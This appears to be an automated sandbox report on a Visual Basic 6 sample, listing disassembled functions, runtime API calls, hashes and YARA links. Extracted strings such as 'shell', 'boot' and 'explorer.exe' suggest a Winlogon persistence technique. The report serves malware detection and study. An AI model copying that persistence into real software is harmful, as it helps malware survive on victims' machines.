Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Move$Free$BstrList$#631ErrorOverflow
String ID: !@$AHA !@
API String ID: 43011225-1712571822
Opcode ID: 1d0fd53414f82b8a5140894465822627a2b2e4415d5277366693652de8302a8f
Instruction ID: 81cdc0ee054e8d02015220d1a651034c4d5d80587a79404b4572d844a8d9d7d0
Opcode Fuzzy Hash: 1d0fd53414f82b8a5140894465822627a2b2e4415d5277366693652de8302a8f
Instruction Fuzzy Hash: CC412E75E00208AFC704DFA4DD85EEE7BB9EB88701F10416AF905E72A1DB749D45CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404FCF, Relevance: 34.9, APIs: 23, Instructions: 352COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0040CFFE
__vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0040D02E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00406330,00000728), ref: 0040D081
__vbaHresultCheckObj.MSVBVM60(00000000,?,004077C4,0000001C), ref: 0040D0C9
__vbaI2I4.MSVBVM60 ref: 0040D0ED
__vbaFreeObj.MSVBVM60 ref: 0040D0FA
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D164
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004082BC,0000004C), ref: 0040D197
__vbaFreeObj.MSVBVM60 ref: 0040D1CF

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$Free$ChkstkError
String ID:
API String ID: 1728155253-0
Opcode ID: 3c944235882b9afb45df9b4f0640810cfb7f24e8e2d8d4c98d1c623bf1b17505
Instruction ID: 5eaa79c7dd67bbe53d223c6610bcbbbf959998076f90a4c84057eb8df8a5bbf3
Opcode Fuzzy Hash: 3c944235882b9afb45df9b4f0640810cfb7f24e8e2d8d4c98d1c623bf1b17505
Instruction Fuzzy Hash: 73F10374D00208EFDB14DFA4C988ADEBBB5FF48304F20816DE50AAB291D779A985CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00419C60, Relevance: 34.7, APIs: 23, Instructions: 171COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,?,Function_000032B6), ref: 00419C7E
__vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 00419CAE
__vbaSetSystemError.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 00419CCB
__vbaSetSystemError.MSVBVM60(00000002,00000000,?,?,?,00000000,Function_000032B6), ref: 00419CE7
__vbaRecUniToAnsi.MSVBVM60(00405598,?,00000128), ref: 00419D24
__vbaSetSystemError.MSVBVM60(?,00000000), ref: 00419D3D
__vbaRecAnsiToUni.MSVBVM60(00405598,00000128,?), ref: 00419D56
__vbaStrFixstr.MSVBVM60(00000104,?,00000001), ref: 00419DB5
__vbaStrMove.MSVBVM60 ref: 00419DC3
__vbaInStr.MSVBVM60(00000000,004099EC,00000000), ref: 00419DD1
__vbaStrFixstr.MSVBVM60(00000104,?,-00000001), ref: 00419DED
__vbaStrMove.MSVBVM60 ref: 00419DFB
#616.MSVBVM60(00000000), ref: 00419E02
__vbaStrMove.MSVBVM60 ref: 00419E10
__vbaLsetFixstr.MSVBVM60(00000104,?,?), ref: 00419E29
__vbaStrMove.MSVBVM60 ref: 00419E51
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00419E67
__vbaSetSystemError.MSVBVM60(?,?,00000000,Function_000032B6), ref: 00419E83
__vbaRecUniToAnsi.MSVBVM60(00405598,?,00000128), ref: 00419EA8
__vbaSetSystemError.MSVBVM60(?,00000000), ref: 00419EC1
__vbaRecAnsiToUni.MSVBVM60(00405598,00000128,?), ref: 00419EDA
__vbaSetSystemError.MSVBVM60(?), ref: 00419F0D

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Error$System$AnsiMove$Fixstr$#616ChkstkFreeListLset
String ID:
API String ID: 3958989997-0
Opcode ID: 79f13ceaef8f2061b8b80027d96b1a3ea6df7ed6deb9aed4509d8a0052579542
Instruction ID: f493f75851a7fc0dbfc09fa37243ff87ef1c3d0c798e8d4c224362c0094269ff
Opcode Fuzzy Hash: 79f13ceaef8f2061b8b80027d96b1a3ea6df7ed6deb9aed4509d8a0052579542
Instruction Fuzzy Hash: D5612D71901259EFDB10EFA0CE4CBEEB778EB48305F1081E9E10AB6190DB785A84CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00422700, Relevance: 34.6, APIs: 23, Instructions: 111COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,?,?,?,00000000,Function_000032B6), ref: 0042271E
__vbaStrCopy.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 0042274B
__vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,Function_000032B6), ref: 0042275A
#648.MSVBVM60(0000000A), ref: 00422779
__vbaFreeVar.MSVBVM60 ref: 00422788
__vbaI2I4.MSVBVM60(?), ref: 0042279C
__vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 004227AA
__vbaI2I4.MSVBVM60 ref: 004227BA
#570.MSVBVM60(00000000), ref: 004227C1
__vbaLenBstr.MSVBVM60(Function_0000545C), ref: 004227CE
__vbaLenBstr.MSVBVM60(Function_0000545C), ref: 00422801
#525.MSVBVM60(00000000), ref: 00422808
__vbaStrMove.MSVBVM60 ref: 00422813
__vbaI2I4.MSVBVM60 ref: 00422823
__vbaFileSeek.MSVBVM60(00000004,00000000), ref: 0042282E
__vbaI2I4.MSVBVM60 ref: 0042283E
__vbaGet3.MSVBVM60(00000000,?,00000000), ref: 0042284B

Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713

__vbaStrMove.MSVBVM60(?), ref: 00422866
__vbaI2I4.MSVBVM60 ref: 00422876
__vbaFileClose.MSVBVM60(00000000), ref: 0042287D
__vbaFreeStr.MSVBVM60(004228BA), ref: 004228AA
__vbaFreeStr.MSVBVM60 ref: 004228B3
__vbaErrorOverflow.MSVBVM60 ref: 004228D0

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$BstrFile$#516#631Error$#525#570#648ChkstkCloseCopyGet3OpenOverflowSeek
String ID:
API String ID: 2204187013-0
Opcode ID: 033fe3c34fbbcf343d2ddb18182b1ad3dc07b0f00dff811bdd5c950921dea067
Instruction ID: 20b1ae5d524e12f90e8be89b45e8a07560083909273999c33b36cc12d9e9d757
Opcode Fuzzy Hash: 033fe3c34fbbcf343d2ddb18182b1ad3dc07b0f00dff811bdd5c950921dea067
Instruction Fuzzy Hash: 3441DC71D00248EFDB04EFA4DB4DBDEBBB4EB48705F108169E502B76A0DB785A44CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004264F0, Relevance: 31.7, APIs: 21, Instructions: 182COMMON

Download Yara Rule

APIs

__vbaAryConstruct2.MSVBVM60(?,0040A1B4,00000011,00000000,72A0C33A,7294A3D7), ref: 00426547
__vbaSetSystemError.MSVBVM60(00000000,?,00000040,?,00000000), ref: 00426571
__vbaSetSystemError.MSVBVM60(?,?,00000002), ref: 00426582
#537.MSVBVM60(00000000), ref: 00426592
__vbaStrMove.MSVBVM60 ref: 0042659F
#537.MSVBVM60(?,00000000), ref: 004265AB
__vbaStrMove.MSVBVM60 ref: 004265B2
__vbaStrCat.MSVBVM60(00000000), ref: 004265B5
__vbaStrMove.MSVBVM60 ref: 004265C0
__vbaStrCmp.MSVBVM60(0040A198,00000000), ref: 004265C8
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004265E5
__vbaSetSystemError.MSVBVM60(?,?,?,00000000), ref: 00426619
__vbaSetSystemError.MSVBVM60(?,?,00000004,?,00000000,?,?,?,00000000), ref: 0042662F
#537.MSVBVM60(?,?,?,00000004,?,00000000,?,?,?,00000000), ref: 00426640
__vbaStrMove.MSVBVM60(?,?,00000004,?,00000000,?,?,?,00000000), ref: 00426647
__vbaStrCmp.MSVBVM60(0040A1AC,00000000,?,?,00000004,?,00000000,?,?,?,00000000), ref: 0042664F
#537.MSVBVM60(00000000,?,?,00000004,?,00000000,?,?,?,00000000), ref: 00426666
__vbaStrMove.MSVBVM60(?,?,00000004,?,00000000,?,?,?,00000000), ref: 0042666D
__vbaStrCmp.MSVBVM60(0040A1A4,00000000,?,?,00000004,?,00000000,?,?,?,00000000), ref: 00426675
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,00000004,?,00000000,?,?,?,00000000), ref: 004266AD
__vbaAryDestruct.MSVBVM60(00000000,?,00426706), ref: 004266FF

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Move$#537ErrorSystem$FreeList$Construct2Destruct
String ID:
API String ID: 2170920009-0
Opcode ID: ee103aa960844d6c0c66a8e010ce742ea9115f4b6a67e78245a25efa224450b7
Instruction ID: fe4e2f04ec6deddc8f2c7747cb95564e443f1ff94db73ec5ebb53e34e52d70e0
Opcode Fuzzy Hash: ee103aa960844d6c0c66a8e010ce742ea9115f4b6a67e78245a25efa224450b7
Instruction Fuzzy Hash: 4E51A371E002299BDB24DBB4CD45FEEBBB9EF48700F20822AE545FB291DA745904CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00428E40, Relevance: 31.7, APIs: 21, Instructions: 166COMMON

Download Yara Rule

APIs

__vbaOnError.MSVBVM60(00000001), ref: 00428E91
__vbaCastObj.MSVBVM60(00000000,0040A2F8), ref: 00428E9F
__vbaObjSet.MSVBVM60(?,00000000), ref: 00428EAA
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A214,000007C4), ref: 00428ED0
__vbaFreeObj.MSVBVM60 ref: 00428EDD
__vbaCastObj.MSVBVM60(00000000,0040A2F8), ref: 00428EF0
__vbaObjSet.MSVBVM60(?,00000000), ref: 00428EFB
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A214,000007C4), ref: 00428F1B
__vbaFreeObj.MSVBVM60 ref: 00428F20
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A214,000007BC), ref: 00428F45
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A308,00000078), ref: 00428F65
__vbaStrCopy.MSVBVM60 ref: 00428F6D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A214,000007B0), ref: 00428F94
#519.MSVBVM60(?), ref: 00428F9A
__vbaStrMove.MSVBVM60 ref: 00428FA5
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00428FB9
__vbaFreeObj.MSVBVM60 ref: 00428FC5
__vbaLenBstr.MSVBVM60(?), ref: 00428FCF
__vbaRaiseEvent.MSVBVM60(?,00000001,00000001), ref: 00428FFC
__vbaExitProc.MSVBVM60 ref: 0042900E
__vbaFreeStr.MSVBVM60(00429046), ref: 0042903F

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresult$Cast$#519BstrCopyErrorEventExitListMoveProcRaise
String ID:
API String ID: 2502233557-0
Opcode ID: 8b414a5269651d8513c98d17b5e9cc8c7bd7953f7acd46c9466d2aa84f4a978d
Instruction ID: 8420092584710669aa1959ba4e0b61b057cd928f4a57778ab52aa14ced9d5afd
Opcode Fuzzy Hash: 8b414a5269651d8513c98d17b5e9cc8c7bd7953f7acd46c9466d2aa84f4a978d
Instruction Fuzzy Hash: DC513C71A01218ABDB00EFA5DE48EDEBBB8FF58704F10416AF505F62A0D7789905CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00419820, Relevance: 31.6, APIs: 21, Instructions: 114COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0041983E
__vbaOnError.MSVBVM60(000000FF,00000000,?,?,00000000,Function_000032B6), ref: 0041986E
__vbaSetSystemError.MSVBVM60 ref: 00419889
__vbaVarDup.MSVBVM60 ref: 004198A3
#606.MSVBVM60(?,?), ref: 004198BA
__vbaStrMove.MSVBVM60 ref: 004198C5
__vbaFreeVar.MSVBVM60 ref: 004198CE
__vbaStrI2.MSVBVM60(00000000,00000000), ref: 004198DF
__vbaStrMove.MSVBVM60 ref: 004198EA
__vbaStrToAnsi.MSVBVM60(?,00000000), ref: 004198F5
__vbaLenBstr.MSVBVM60(?,00000000), ref: 00419900
__vbaStrToAnsi.MSVBVM60(?,?,00000000), ref: 0041990F
__vbaSetSystemError.MSVBVM60(00000000,00000000,00000000,000000FF,00000000), ref: 00419927
__vbaStrToUnicode.MSVBVM60(?,?), ref: 00419935
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00419949
#644.MSVBVM60(?), ref: 0041995D
__vbaSetSystemError.MSVBVM60(00000000), ref: 0041996C
#616.MSVBVM60(?,?), ref: 0041997A
__vbaStrMove.MSVBVM60 ref: 00419985
__vbaFreeStr.MSVBVM60(004199D0), ref: 004199C9
__vbaErrorOverflow.MSVBVM60(?), ref: 004199E6

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Error$FreeMoveSystem$Ansi$#606#616#644BstrChkstkListOverflowUnicode
String ID:
API String ID: 3094200983-0
Opcode ID: d6910d33025b062d129a1e8649d8f18e20bade111b3a8211ccca0156f543e9fa
Instruction ID: c4f5bd512d1b3bf9bc8ce298c4f3288c9308f79173eb6556b40925b4054b111f
Opcode Fuzzy Hash: d6910d33025b062d129a1e8649d8f18e20bade111b3a8211ccca0156f543e9fa
Instruction Fuzzy Hash: 2B410FB5900249EFDB04DFE4DE49BDEBBB8EB48305F104669F601B72A0DB746A44CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004296C0, Relevance: 29.8, APIs: 13, Strings: 4, Instructions: 87COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,?,0040CAFD,0042C0D4), ref: 004296DE
__vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042970E
__vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429723

Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713

__vbaStrMove.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 0042973D
__vbaStrCat.MSVBVM60(00000000,?,?,?,00000000,004032B6), ref: 00429744
__vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042974F
__vbaStrCat.MSVBVM60(explorer.exe, ,00000000,?,?,?,00000000,004032B6), ref: 00429761
__vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042976C
__vbaStrCat.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429779
__vbaStrMove.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429784
__vbaStrCopy.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429792
__vbaStrCopy.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 004297A0

Part of subcall function 004295B0: __vbaStrToAnsi.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,004032B6,00000000), ref: 004295F7
Part of subcall function 004295B0: __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,?,?,?,?,?,?,004032B6,00000000), ref: 00429604
Part of subcall function 004295B0: __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004032B6,00000000), ref: 00429611
Part of subcall function 004295B0: __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?), ref: 0042961E
Part of subcall function 004295B0: __vbaSetSystemError.MSVBVM60(00000000,?,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?), ref: 00429629
Part of subcall function 004295B0: __vbaStrToUnicode.MSVBVM60(00000000,?,?,00000000,?,00000000,?,00000000), ref: 0042963D
Part of subcall function 004295B0: __vbaStrToUnicode.MSVBVM60(004032B6,?,?,00000000,?,00000000,?,00000000), ref: 00429647
Part of subcall function 004295B0: __vbaStrToUnicode.MSVBVM60(?,?,?,00000000,?,00000000,?,00000000), ref: 0042964E
Part of subcall function 004295B0: __vbaStrToUnicode.MSVBVM60(?,?,?,00000000,?,00000000,?,00000000), ref: 00429655
Part of subcall function 004295B0: __vbaI2I4.MSVBVM60(?,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004032B6), ref: 0042965A
Part of subcall function 004295B0: __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000000,?,00000000,?,00000000), ref: 00429675

__vbaFreeStrList.MSVBVM60(00000007,?,?,?,00000000,?,?,?,00000000,?,?,?,?,00000000), ref: 004297D9

Strings

shell, xrefs: 0042978A
boot, xrefs: 00429798
yLb+$8, xrefs: 0042971B
explorer.exe, , xrefs: 0042975C

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Move$AnsiFreeUnicode$Copy$#516#631ErrorList$BstrChkstkSystem
String ID: boot$explorer.exe, $shell$yLb+$8
API String ID: 913952100-2157437457
Opcode ID: 5a922159ef6c9492d48b2dcfb2da36ea5094812e49396599d2798a0ab338517f
Instruction ID: 6554cbec377a6d1fb2d016b249b8349fe5e87df9b4ee87d3b31f4120235b6aae
Opcode Fuzzy Hash: 5a922159ef6c9492d48b2dcfb2da36ea5094812e49396599d2798a0ab338517f
Instruction Fuzzy Hash: 9E311072910208EBCB05EF94DE58EDE7BB8FB48300F10812AF502B75A0DB745A48CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419F80, Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 84COMMON

Download Yara Rule

APIs

#712.MSVBVM60(?,\??\,00408114,00000001,000000FF,00000000,?,00000000,?,?,00000000,Function_000032B6,00000000), ref: 00419FCC
__vbaStrMove.MSVBVM60(?,\??\,00408114,00000001,000000FF,00000000,?,00000000,?,?,00000000,Function_000032B6,00000000), ref: 00419FD9
#712.MSVBVM60(?,\\?\,00408114,00000001,000000FF,00000000,?,\??\,00408114,00000001,000000FF,00000000,?,00000000), ref: 00419FEE
__vbaStrMove.MSVBVM60(?,\??\,00408114,00000001,000000FF,00000000,?,00000000,?,?,00000000,Function_000032B6,00000000), ref: 00419FF5
#712.MSVBVM60(?,\SystemRoot\,00000000,00000001,000000FF,00000001,?,\??\,00408114,00000001,000000FF,00000000,?,00000000), ref: 0041A00C
__vbaStrMove.MSVBVM60(?,\??\,00408114,00000001,000000FF,00000000,?,00000000,?,?,00000000,Function_000032B6,00000000), ref: 0041A013
#712.MSVBVM60(?,%systemroot%,00000000,00000001,000000FF,00000001,?,\??\,00408114,00000001,000000FF,00000000,?,00000000), ref: 0041A02B
__vbaStrMove.MSVBVM60(?,\??\,00408114,00000001,000000FF,00000000,?,00000000,?,?,00000000,Function_000032B6,00000000), ref: 0041A032
#712.MSVBVM60(?,00409A70,00406544,00000001,000000FF,00000000,?,\??\,00408114,00000001,000000FF,00000000,?,00000000), ref: 0041A047
__vbaStrMove.MSVBVM60(?,\??\,00408114,00000001,000000FF,00000000,?,00000000,?,?,00000000,Function_000032B6,00000000), ref: 0041A04E
__vbaStrCopy.MSVBVM60(?,\??\,00408114,00000001,000000FF,00000000,?,00000000,?,?,00000000,Function_000032B6,00000000), ref: 0041A056
__vbaFreeStr.MSVBVM60(0041A077,?,\??\,00408114,00000001,000000FF,00000000,?,00000000,?,?,00000000,Function_000032B6,00000000), ref: 0041A070

Strings

%systemroot%, xrefs: 0041A025
\SystemRoot\, xrefs: 0041A006
\\?\, xrefs: 00419FE8
\??\, xrefs: 00419FC0

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$#712Move$CopyFree
String ID: %systemroot%$\??\$\SystemRoot\$\\?\
API String ID: 2546659950-1311169778
Opcode ID: 3bbe944c0420e29e53f14083bd92761ec41afb95eb268ab6b37192bc3106c6e6
Instruction ID: d6e337f52aa0f406b5b9e7ae7ca613ada50fa9dc8b45b6b45c56035a55262318
Opcode Fuzzy Hash: 3bbe944c0420e29e53f14083bd92761ec41afb95eb268ab6b37192bc3106c6e6
Instruction Fuzzy Hash: 7F213771B502197BCB00DB54CD82FEFBBB9AB54714F20422AB211B72E4DAB45D458ED4

Uniqueness

Uniqueness Score: -1.00%

Function 004174C3, Relevance: 27.1, APIs: 18, Instructions: 103COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60(004178BC), ref: 00417733
#616.MSVBVM60(00000000,00000000), ref: 00417754
__vbaStrMove.MSVBVM60 ref: 0041775F
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
__vbaStrMove.MSVBVM60 ref: 00417770
#631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
__vbaStrMove.MSVBVM60 ref: 00417799
__vbaStrCat.MSVBVM60(00000000), ref: 0041779C
__vbaStrMove.MSVBVM60 ref: 004177A5
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
__vbaFreeVar.MSVBVM60 ref: 004177C1
__vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
__vbaStrCopy.MSVBVM60 ref: 004177F0
__vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
__vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
__vbaAryUnlock.MSVBVM60(?), ref: 004178A9
__vbaFreeStr.MSVBVM60 ref: 004178B4
__vbaFreeStr.MSVBVM60 ref: 004178B9

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$FreeMove$CopyUnlock$#616#631BstrErrorListSystem
String ID:
API String ID: 1554985673-0
Opcode ID: 6726c06902441f1d2235df1c00d48d0c759b3237af640a1265f08938f302ce1f
Instruction ID: babe0322a797a5b6fd9da037fd94c9e8bb3a8b55dbd2c7b94b419f711927b1e7
Opcode Fuzzy Hash: 6726c06902441f1d2235df1c00d48d0c759b3237af640a1265f08938f302ce1f
Instruction Fuzzy Hash: A741A575A04114DFC724DFA4ED849EE77B9EF48300F10456BE505A3261DB785986CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041744B, Relevance: 27.1, APIs: 18, Instructions: 96COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60(004178BC), ref: 00417733
#616.MSVBVM60(00000000,00000000), ref: 00417754
__vbaStrMove.MSVBVM60 ref: 0041775F
__vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
__vbaStrMove.MSVBVM60 ref: 00417770
#631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
__vbaStrMove.MSVBVM60 ref: 00417799
__vbaStrCat.MSVBVM60(00000000), ref: 0041779C
__vbaStrMove.MSVBVM60 ref: 004177A5
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
__vbaFreeVar.MSVBVM60 ref: 004177C1
__vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
__vbaStrCopy.MSVBVM60 ref: 004177F0
__vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
__vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
__vbaAryUnlock.MSVBVM60(?), ref: 004178A9
__vbaFreeStr.MSVBVM60 ref: 004178B4
__vbaFreeStr.MSVBVM60 ref: 004178B9
__vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
__vbaAryLock.MSVBVM60(?,00000000,72A26A76,72A26C30,72A29596), ref: 00417B35
__vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
__vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
__vbaSetSystemError.MSVBVM60 ref: 00417B9B
__vbaStrMove.MSVBVM60(?), ref: 00417BB5
__vbaStrMove.MSVBVM60(?), ref: 00417BC5
__vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
__vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
__vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
__vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
__vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
__vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
__vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
__vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
__vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
__vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
__vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Move$Error$Free$System$Unlock$BoundsCopyGenerateList$#616#631BstrLockOverflow
String ID:
API String ID: 1701566546-0
